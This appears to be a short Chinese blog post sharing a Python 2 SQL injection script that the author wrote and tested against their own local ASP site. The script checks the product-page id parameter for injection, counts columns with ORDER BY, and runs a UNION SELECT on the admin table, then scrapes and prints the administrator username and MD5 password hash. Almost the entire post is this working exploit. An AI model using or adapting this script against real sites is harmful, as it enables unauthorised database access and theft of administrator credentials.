由于是对自己搭建的环境进行测试 所以觉得很僵硬 并且这个程序还没有爆破的功能,联合查询时只能用常用的 admin,password 这点以后有时间可以改进
注入点:
http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513
上代码吧:
#coding:utf-8 import requests import re s=requests.session() url1='http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513 ' def order_by(url1):#判断有多少字段 for i in range(1,100): url = url1+'order by '+str(i) r=s.get(url,timeout=2) if r.status_code!=200: return i break def point_(url1):#判断是否可注入 url_t=url1+' and 1=1' url_f=url1+' and 1=2' r1=requests.get(url_t) r2=requests.get(url_f) if r1.status_code!=r2.status_code: print '存在注入' return 1 def biaodashi(url1,j): #组合形成查询表达式 key='1' f=1 for f in range(2,j): key=key+','+str(f) return key try: if point_(url1)==1: order_by=order_by(url1=url1) biaodashi=biaodashi(url1=url1,j=order_by) yuju='union select '+biaodashi+' from admin' url=url1+yuju r=requests.get(url).content #<td height="20" width="663">3</td> pattern=re.compile('<td height="20" width="663">(.*?)</td>') L1=re.search(pattern,r).group(1) sql=url.replace(','+L1,',admin') r = requests.get(sql).content pattern = re.compile('<td height="20" width="663">(.*?)</td>') username= re.search(pattern, r).group(1) print 'username:'+username sql2=url.replace(','+L1,',password') r = requests.get(sql2).content password=re.search(pattern, r).group(1) print 'password:'+password+'------(md5)' else: print '不存在注入点' except: pass